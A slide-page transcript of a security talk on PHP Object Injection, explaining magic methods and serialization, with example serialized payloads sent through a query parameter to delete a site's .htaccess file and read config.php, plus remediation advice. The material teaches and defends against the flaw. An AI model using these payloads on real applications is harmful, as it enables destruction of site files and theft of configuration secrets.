A deep dive into PHP Object Injection Ionut Popescu.

Slides:

Advertisements

Similar presentations

Powerpoint Templates Page 1 Powerpoint Templates Server Side Scripting PHP.

Advertisements

©2009 Justin C. Klein Keane PHP Code Auditing Session 4.2 – File Include Vulnerabilities Justin C. Klien Keane

Types, exploitation, and prevention

SE-1020 Dr. Mark L. Hornick 1 Exceptions and Exception Handling.

The Intelligent Fuzzing in TTCN-3 Xu Luo, Wu Ji, Liu Chao Software Engineering Institute Beihang University

© 2013 Imperva, Inc. All rights reserved. PHP SuperGlobals: Supersized Trouble 1 Shelly Hershkovitz, Senior Security Analyst, Imperva.

-Ajay Babu.D y5cs022.. Contents Who is hacker? History of hacking Types of hacking Do You Know? What do hackers do? - Some Examples on Web application.

1 CS2200 Software Development Lecture: Testing and Design A. O’Riordan, 2008 K. Brown,

1 CS2200 Software Development Lecture 27: More Testing A. O’Riordan, 2008 K. Brown,

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Server side basics.

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

PHP Programming with MySQL Slide 11-1 CHAPTER 11 Developing Object-Oriented PHP.

Nikolay Kostov Telerik Corporation

Automatic Creation of SQL Injection and Cross-Site Scripting Attacks 2nd-order XSS attacks 1st-order XSS attacks SQLI attacks Adam Kiezun, Philip J. Guo,

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Preventing SQL Injection ~example of SQL injection $user = $_POST[‘user’]; $pass = $_POST[‘pass’]; $query = DELETE FROM Users WHERE user = ‘$user’ AND.

Chapter 4 – The Building Blocks Data Types Literals Variables Constants.

Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report

Prevent Cross-Site Scripting (XSS) attack

Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting.

Hamdi Yesilyurt, MA Student in MSDF & PhD-Public Affaris SQL Riji Jacob MS Student in Computer Science.

Objectives In this chapter, you will:

A Security Review Process for Existing Software Applications

BIT 1003 – Presentation 7. Contents GENERATIONS OF LANGUAGES COMPILERS AND INTERPRETERS VIRTUAL MACHINES OBJECT-ORIENTED PROGRAMMING SCRIPTING LANGUAGES.

NMED 3850 A Advanced Online Design January 26, 2010 V. Mahadevan.

Exploitation: Buffer Overflow, SQL injection, Adobe files Source:

OSI and TCP/IP Models And Some Vulnerabilities AfNOG th May 2011 – 10 th June 2011 Tanzania By Marcus K. G. Adomey.

Martin Kruliš This is an Object Oriented system. If we change something, the users object by Martin Kruliš (v1.0)1.

Web Application Security ECE ECE Internetwork Security What is a Web Application? An application generally comprised of a collection of scripts.

Copyright © 2002, Systems and Computer Engineering, Carleton University Hashtable.ppt * Object-Oriented Software Development Unit 8.

Introduction to PHP A user navigates in her browser to a page that ends with a.php extension The request is sent to a web server, which directs the request.

A Simple Java Relational Database Thomas A. Bullinger March 20, 2001

SQL Injection Jason Dunn. SQL Overview Structured Query Language For use with Databases Purpose is to retrieve information Main Statements Select Insert.

Security Attacks CS 795. Buffer Overflow Problem Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program.

Comments in PHP In PHP, we use // to make a singleline comment or /* and */ to make a large comment block. Comment is a part of your PHP code that will.

Aniket Joshi Justin Thomas. Agenda Introduction to SQL Injection SQL Injection Attack SQL Injection Prevention Summary.

Data TypestMyn1 Data Types The type of a variable is not set by the programmer; rather, it is decided at runtime by PHP depending on the context in which.

What is exactly Exploit writing?  Writing a piece of code which is capable of exploit the vulnerability in the target software.

COP INTERMEDIATE JAVA Designing Classes. Class Template or blueprint for creating objects. Their definition includes the list of properties (fields)

WEB SECURITY WEEK 2 Computer Security Group University of Texas at Dallas.

Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.

PHP Error Handling & Reporting. Error Handling Never allow a default error message or error number returned by the mysql_error() and mysql_errno() functions.

What Is XSS ? ! Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to.

Spring 2009 Programming Fundamentals I Java Programming XuanTung Hoang Lecture No. 8.

21. PHP Classes To define a class, use the keyword class followed by the name and a block with the properties and method definitions Properties are declared.

Chapter 10 Developing Object-Oriented PHP. 2 Objectives In this chapter, you will: Study object-oriented programming concepts Use objects in PHP scripts.

Dr. Abdullah Almutairi Spring PHP is a server scripting language, and a powerful tool for making dynamic and interactive Web pages. PHP is a widely-used,

Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.

Apache Avro CMSC 491 Hadoop-Based Distributed Computing Spring 2016 Adam Shook.

Radoslav Georgiev Telerik Corporation

SQL INJECTION Diwakar Kumar Dinkar M.Tech, CS&E Roll Diwakar Kumar Dinkar M.Tech, CS&E Roll

PHP using MySQL Database for Web Development (part II)

CONTENT MANAGEMENT SYSTEM CSIR-NISCAIR, New Delhi

Advance OOP in PHP.

Theodore Lawson CSCE548 Student Presentation, Topic #2

Web Technologies PHP 5 Basic Language.

A Security Review Process for Existing Software Applications

Scope, Objects, Strings, Numbers

Logical vulnerabilities

Chapter 11 Developing Object-Oriented PHP PHP Programming with MySQL Revised by A. Philipp – Spring 2010 (Rev SP’11)

Hash table another data structure for implementing a map or a set

Web Systems Development (CSC-215)

Introduction to the Common Attack Pattern Enumeration and Classification (CAPEC) Sean Barnum Sunday, December 09, 2018.

Lecture 2 - SQL Injection

Introduction to Data Structure

Understanding and Preventing Buffer Overflow Attacks in Unix

SEEM 4540 Tutorial 4 Basic PHP based on w3Schools

Presentation transcript:

A deep dive into PHP Object Injection Ionut Popescu

Contents Part 1: Background information Part 2: Vulnerability exploitation Part 3: Demo

Vulnerability description “PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.” - OWASPOWASP

Vulnerable software  WordPress  Magento  Joomla  IP Board  Dotclear  OpenCart  CubeCart  Drupal 7.34  vBulletin  Tuelap  Moodle  WHMCS

Part 1: Background information

Classes in PHP

PHP Magic Methods __construct() __destruct() __call() __callStatic() __get() __set() __isset() __unset() __sleep() __wakeup() __toString() __invoke() __set_state() __clone() __debugInfo()

Magic methods example Output: __construct This is a string __toString __destruct

Magic methods example #2 Output: Get: Data Set: RHOST = Call: run Invoke: shell

Object serialization serialize — Generates a storable representation of a value String s:size:value; Integer i:value; Boolean b:value; (does not store "true" or "false", does store '1' or '0') Null N; Array a:size:{key definition;value definition;(repeated per element)} Object O:strlen(object name):object name:object size:{s:strlen(property name):property name:property definition;(repeated per property)}

Serialization example Output: s:5:"OWASP"; O:8:"stdClass":0:{} b:1; a:3:{i:0;i:1;i:1;i:2;i:2;i:3;} O:8:"stdClass":0:{}

Serialization example #2 User John is 20 years old. O:4:"User":2: { s:3:"age";i:20; s:4:"name";s:4:"John"; }

unserialize “magic” If the serialized string is an object, unserialize will: 1.Create an object instance (with specified values) 2.Call __wakeup function (if it is present) 3.Call __destruct function (if it is present) at script execution end

Unserialize example __construct __sleep Serialized: O:4:"Test":2:{s:8:"variable";s:4:"BUZZ";s:9:"variable 2";s:5:"OTHER";} __wakeup BUZZ __destruct

Part 2: Vulnerability exploitation

PHP Object Injection Application calls “unserialize” with user-supplied data There are classes that implement __destruct, __wakeup or other functions Classes are loaded at the “unserialize” time (autoloading will help)

Vulnerable code example

Exploitation Normal call: script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";} Exploit: Create a serialized LogFile object that will delete “.htaccess” on destructor Output: O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";} __destruct deletes ".htaccess" file. Call: script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";} Result: __destruct deletes ".htaccess" file.

Vulnerable code example #2

Exploitation #2 Normal call: script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";} Exploit: Create a serialized FileClass object that will read “config.php” file on __toString Output: O:9:"FileClass":1:{s:8:"filename";s:10:"config.php";} Call: script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php";} Result:

Other exploitation vectors Other magic methods: __get, __set, __call… Normal functions with the same name. E.g. – User::getData() – Database::getData()

How to fix? Do not use “unserialize” on user-supplied data Use json_decode

Part 3: Demo

IP Board – Vulnerable code /admin/sources/base/core.php:

IP Board - Exploitation /ips_kernel/classDb.php:

IP Board – Public exploit

References [1] Understanding PHP Object Injection [2] Classes and Objects [3] Magic Methods [4] unserialize [5] Shocking News in PHP Exploitation [6] Code Reuse Attacks in PHP: Automated POP Chain Generation [7] Invision Power Board <= "unserialize()" PHP Code Execution [8] WordPress < PHP Object Injection [9] Remote Code Execution exploit in WordPress

Questions? Thank you, Ionut Popescu